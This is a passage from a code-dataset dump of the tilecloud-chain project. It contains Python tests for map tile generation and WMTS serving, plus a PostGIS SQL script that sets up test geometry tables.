0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 2.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_layer_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l polygon -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/polygon/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product((5, 6, 7), (4, 5, 6, 7))),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 0\n Nb tiles stored: 12\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [0-9.]+ Kio\n Time per tile: [0-9.]+ ms\n Size per tile: [69][0-9][0-9] o\n\n \"\"\",\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s \"\n \"-c tilegeneration/test-nosns.yaml -l polygon -z 0\"\n \" -b 550000 170000 560000 180000\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/polygon/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(6, 5), (7, 5)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 2\n Nb tiles dropped: 0\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 1.[6-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [89][0-9][0-9] o\n\n \"\"\",\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s \"\n \"-c tilegeneration/test-nosns.yaml -l polygon -z 0\"\n \" -b 550000.0 170000.0 560000.0 180000.0\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/polygon/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(6, 5), (7, 5)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 2\n Nb tiles dropped: 0\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 1.[6-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [89][0-9][0-9] o\n\n \"\"\",\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l all -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/all/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(6, 5), (7, 5)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'all \\(DATE=2012\\)' is finish\n Nb generated tiles: 2\n Nb tiles dropped: 0\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 1.[6-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [89][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_hash_generation(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l point_hash -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(5, 7), (7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 9[0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_mapnik(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l mapnik -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/mapnik/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product((5, 6, 7), (4, 5, 6, 7))),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'mapnik' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 0\n Nb tiles stored: 12\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 9.7 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 823 o\n\n \"\"\",\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_mapnik_grid(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l mapnik_grid -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/mapnik_grid/default/2012/swissgrid_5/0/%i/%i.json\",\n tiles=list(product((5, 6, 7), (4, 5, 6, 7))),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'mapnik_grid' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 0\n Nb tiles stored: 12\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 4.5 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 385 o\n\n \"\"\",\n )\n with open(\"/tmp/tiles/1.0.0/mapnik_grid/default/2012/swissgrid_5/0/5/5.json\") as f:\n self.assert_result_equals(\n f.read(),\n '{\"keys\": [\"\", \"1\"], \"data\": {\"1\": {\"name\": \"polygon1\"}}, \"grid\": [\" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \"!!!!!!!!!!!!!!!!\", \"!!!!!!!!!!!!!!!!\"]}',\n )\n with open(\"/tmp/tiles/1.0.0/mapnik_grid/default/2012/swissgrid_5/0/6/5.json\") as f:\n self.assert_result_equals(\n f.read(),\n '{\"keys\": [\"1\"], \"data\": {\"1\": {\"name\": \"polygon1\"}}, \"grid\": [\" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \"]}',\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_mapnik_grid_drop(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l mapnik_grid_drop -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/mapnik_grid_drop/default/2012/swissgrid_5/0/%i/%i.json\",\n tiles=((5, 7), (7, 4)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'mapnik_grid_drop' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 10\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 768 o\n Time per tile: [0-9]+ ms\n Size per tile: 384 o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_not_authorised_user(self) -> None:\n for d in (\"-d\", \"-q\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_exit_equals(\n cmd=f\".build/venv/bin/generate_tiles {d} -c tilegeneration/test-authorised.yaml\",\n main_func=generate.main,\n )\n log_capture.check(\n (\n \"tilecloud_chain.generate\",\n \"ERROR\",\n \"not authorized, authorized user is: www-data.\",\n )\n )\n\n def test_verbose(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 2 -v -l polygon\".format(d),\n main_func=generate.main,\n )\n log_capture.check()\n\n def test_time(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --time 2 -l polygon\".format(d),\n main_func=generate.main,\n expected=r\"\"\"size: 770\n size: 862\n size: 862\n size: 862\n time: [0-9]*\n size: 862\n size: 862\n \"\"\",\n regex=True,\n empty_err=True,\n )\n log_capture.check()\n\n def test_time_layer_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --time 2 -l all\".format(d),\n main_func=generate.main,\n expected=r\"\"\"size: 1010\n size: 1010\n size: 1010\n size: 1010\n time: [0-9]*\n size: 1010\n size: 1010\n \"\"\",\n regex=True,\n empty_err=True,\n )\n log_capture.check()\n\n # def test_daemonize(self):\n # with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n # self.assert_cmd_equals(\n # cmd='.build/venv/bin/generate_tiles %s -c tilegeneration/test.yaml -t 1 --daemonize' % d,\n # main_func=generate.main,\n # expected=r\"\"\"Daemonize with pid [0-9]*.\"\"\",\n # regex=True)\n # log_capture.check()\n\n def _touch(self, tiles_pattern: str, tiles: List[Tuple[int, int]]) -> None:\n for tile in tiles:\n path = tiles_pattern % tile\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(path, \"w\"):\n pass\n\n def test_delete_meta(self) -> None:\n for d in (\"-d\", \"\"):\n if os.path.exists(\"/tmp/tiles/\"):\n shutil.rmtree(\"/tmp/tiles/\")\n self._touch(\n tiles_pattern=\"/tmp/tiles/1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product(range(12), range(16))),\n )\n self.assert_tiles_generated_deleted(\n cmd=(\n \".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash_no_meta -z 0\" % d\n ),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(5, 7), (7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash_no_meta \\(DATE=2012\\)' is finish\nNb generated tiles: 247\nNb tiles dropped: 245\nNb tiles stored: 2\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: [89][0-9][0-9] o\nTime per tile: [0-9]+ ms\nSize per tile: 4[0-9][0-9] o\n\n\"\"\",\n )\n\n def test_delete_no_meta(self) -> None:\n for d in (\"-d\", \"\"):\n if os.path.exists(\"/tmp/tiles/\"):\n shutil.rmtree(\"/tmp/tiles/\")\n self._touch(\n tiles_pattern=\"/tmp/tiles/1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product(range(12), range(16))),\n )\n self.assert_tiles_generated_deleted(\n cmd=(\n \".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash_no_meta -z 0\" % d\n ),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(5, 7), (7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash_no_meta \\(DATE=2012\\)' is finish\nNb generated tiles: 247\nNb tiles dropped: 245\nNb tiles stored: 2\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: [89][0-9][0-9] o\nTime per tile: [0-9]+ ms\nSize per tile: 4[0-9][0-9] o\n\n\"\"\",\n )\n\n def test_error_file_create(self) -> None:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n\n if os.path.exists(\"error.list\"):\n os.remove(\"error.list\")\n self.assert_main_except_equals(\n cmd=\".build/venv/bin/generate_tiles -q -c tilegeneration/test-nosns.yaml -l point_error\",\n main_func=generate.main,\n regex=True,\n get_error=True,\n expected=[\n [\n \"error.list\",\n \"\\n\".join(\n [\n r\"# \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] [0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] \"\n r\"Start the layer 'point_error' generation\",\n r\"0/0/0:\\+8/\\+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 \"\n r\"host=localhost layer=point_error # \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] \"\n r\"[0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] 'WMS server error: msWMSLoadGetMapParams\\(\\): \"\n r\"WMS server error\\. Invalid layer\\(s\\) given in the LAYERS parameter\\. \"\n r\"A layer might be disabled for this request\\. Check wms/ows_enable_request \"\n r\"settings\\.'\",\n r\"0/0/8:\\+8/\\+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 \"\n r\"host=localhost layer=point_error # \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] \"\n r\"[0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] 'WMS server error: msWMSLoadGetMapParams\\(\\): \"\n r\"WMS server error\\. Invalid layer\\(s\\) given in the LAYERS parameter\\. \"\n r\"A layer might be disabled for this request\\. Check wms/ows_enable_request \"\n r\"settings\\.'\",\n r\"0/8/0:\\+8/\\+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 \"\n r\"host=localhost layer=point_error # \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] \"\n r\"[0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] 'WMS server error: msWMSLoadGetMapParams\\(\\): \"\n r\"WMS server error\\. Invalid layer\\(s\\) given in the LAYERS parameter\\. \"\n r\"A layer might be disabled for this request\\. Check wms/ows_enable_request settings\\.'\",\n \"\",\n ]\n ),\n ]\n ],\n )\n\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n\n def test_error_file_use(self) -> None:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n main_congifile = os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = \"tilegeneration/test-nosns.yaml\"\n\n try:\n if os.path.exists(\"error.list\"):\n os.remove(\"error.list\")\n\n with open(\"error.list\", \"w\") as error_file:\n error_file.write(\n \"# comment\\n\"\n \"0/0/0:+8/+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 layer=point_hash \"\n \"# comment\\n\"\n \"0/0/8:+8/+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 layer=point_hash\\n\"\n \"0/8/0:+8/+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 layer=point_hash\\n\"\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d --tiles error.list\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[(0, 5, 7), (0, 7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation is finish\n Nb generated metatiles: 3\n Nb metatiles dropped: 1\n Nb generated tiles: 128\n Nb tiles dropped: 126\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n finally:\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = main_congifile\n\n def test_multy(self) -> None:\n for d in (\"-v\", \"\"):\n self.assert_tiles_generated(\n cmd=f\".build/venv/bin/generate_tiles {d} -c tilegeneration/test-multidim.yaml\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/multi/default/%s/swissgrid/%i/%i/%i.png\",\n tiles=[\n (\"point1\", 0, 5, 7),\n (\"point1\", 1, 11, 14),\n (\"point1\", 2, 29, 35),\n (\"point2\", 0, 7, 4),\n (\"point2\", 1, 15, 8),\n (\"point2\", 2, 39, 21),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'multi \\(POINT_NAME=point1 - POINT_NAME=point2\\)' is finish\nNb generated metatiles: 16\nNb metatiles dropped: 10\nNb generated tiles: 384\nNb tiles dropped: 378\nNb tiles stored: 6\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: 2.9 Kio\nTime per tile: [0-9]+ ms\nSize per tile: 498 o\n\n\"\"\",\n )\n\n def test_redis(self) -> None:\n RedisTileStore(sentinels=[[\"redis_sentinel\", 26379]]).delete_all()\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis.yaml --role master -l point\",\n main_func=generate.main,\n regex=False,\n expected=\"\"\"The tile generation of layer 'point (DATE=2012)' is finish\nNb of generated jobs: 10\n\n\"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 10\nApproximate number of generating tiles: 0\nTiles in error:\n\"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis.yaml --role slave\",\n main_func=generate.main,\n regex=True,\n expected=r\"\"\"The tile generation is finish\nNb generated metatiles: 10\nNb metatiles dropped: 0\nNb generated tiles: 640\nNb tiles dropped: 0\nNb tiles stored: 640\nNb tiles in error: 0\nTotal time: 0:\\d\\d:\\d\\d\nTotal size: \\d+ Kio\nTime per tile: \\d+ ms\nSize per tile: \\d+ o\n\n\"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 0\nApproximate number of generating tiles: 0\nTiles in error:\n\"\"\",\n )\n\n def test_redis_main_config(self) -> None:\n main_congifile = os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"]\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = \"tilegeneration/test-redis-main.yaml\"\n\n try:\n RedisTileStore(sentinels=[[\"redis_sentinel\", 26379]]).delete_all()\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis-project.yaml --role master -l point\",\n main_func=generate.main,\n regex=False,\n expected=\"\"\"The tile generation of layer 'point (DATE=2012)' is finish\n Nb of generated jobs: 10\n\n \"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis-project.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 10\n Approximate number of generating tiles: 0\n Tiles in error:\n \"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis-project.yaml --role slave\",\n main_func=generate.main,\n regex=True,\n expected=r\"\"\"The tile generation is finish\n Nb generated metatiles: 10\n Nb metatiles dropped: 0\n Nb generated tiles: 640\n Nb tiles dropped: 0\n Nb tiles stored: 640\n Nb tiles in error: 0\n Total time: 0:\\d\\d:\\d\\d\n Total size: \\d+ Kio\n Time per tile: \\d+ ms\n Size per tile: \\d+ o\n\n \"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis-project.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 0\n Approximate number of generating tiles: 0\n Tiles in error:\n \"\"\",\n )\n finally:\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = main_congifile\n" }, { "alpha_fraction": 0.575501561164856, "alphanum_fraction": 0.7444561719894409, "avg_line_length": 46.349998474121094, "blob_id": "501b07a5757c1fc4e8bd1a30261a4e99ec155c81", "content_id": "a5d07437b28d676bdfbb1ea788cf584bc4a22cb6", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 947, "license_type": "permissive", "max_line_length": 160, "num_lines": 20, "path": "/docker/test-db/10_init.sql", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "CREATE EXTENSION postgis;\n\nCREATE SCHEMA tests;\n\nCREATE TABLE tests.point (gid serial Primary KEY, name varchar(10));\nSELECT AddGeometryColumn('tests', 'point','the_geom',21781,'POINT',2);\n\nCREATE TABLE tests.line (gid serial Primary KEY, name varchar(10));\nSELECT AddGeometryColumn('tests', 'line','the_geom',21781,'LINESTRING',2);\n\nCREATE TABLE tests.polygon (gid serial Primary KEY, name varchar(10));\nSELECT AddGeometryColumn('tests', 'polygon','the_geom',21781,'POLYGON',2);\n\n\nINSERT INTO tests.point VALUES (0, 'point1', ST_GeomFromText('POINT (600000 200000)', 21781));\nINSERT INTO tests.point VALUES (1, 'point2', ST_GeomFromText('POINT (530000 150000)', 21781));\n\nINSERT INTO tests.line VALUES (0, 'line1', ST_GeomFromText('LINESTRING (600000 200000,530000 150000)', 21781));\n\nINSERT INTO tests.polygon VALUES (0, 'polygon1', ST_GeomFromText('POLYGON ((600000 200000,600000 150000,530000 150000, 530000 200000, 600000 200000))', 21781));\n" }, { "alpha_fraction": 0.5155675411224365, "alphanum_fraction": 0.5524795651435852, "avg_line_length": 35.618133544921875, "blob_id": "6e2ffe6982b6b4cde7de6572f9003babf0133fb5", "content_id": "e5f8f41fe51eeb8317256aca016474f337858f2a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39987, "license_type": "permissive", "max_line_length": 110, "num_lines": 1092, "path": "/tilecloud_chain/tests/test_serve.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport shutil\n\nimport pytest\nfrom pyramid.httpexceptions import HTTPBadRequest, HTTPNoContent\nfrom pyramid.testing import DummyRequest\nfrom testfixtures import LogCapture\n\nfrom tilecloud_chain import controller, generate, server\nfrom tilecloud_chain.server import PyramidView, app_factory\nfrom tilecloud_chain.tests import CompareCase\n\nCAPABILITIES = (\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/wmts/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n <ows:Value>KVP</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>point_hash</ows:Title>\n <ows:Identifier>point_hash</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <InfoFormat></InfoFormat>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/wmts/1.0.0/point_hash/default/{DATE}/\"\"\"\n r\"\"\"{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid_5</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid_5</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\"\n)\n\n\nclass TestServe(CompareCase):\n def setUp(self) -> None: # noqa\n self.maxDiff = None\n\n @classmethod\n def setUpClass(cls): # noqa\n os.chdir(os.path.dirname(__file__))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n if os.path.exists(\"/tmp/tiles\"):\n shutil.rmtree(\"/tmp/tiles\")\n\n def test_serve_kvp(self) -> None:\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash --zoom 1\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[\n (\"point_hash/default/2012/swissgrid_5/1/11/14.png\"),\n (\"point_hash/default/2012/swissgrid_5/1/15/8.png\"),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] 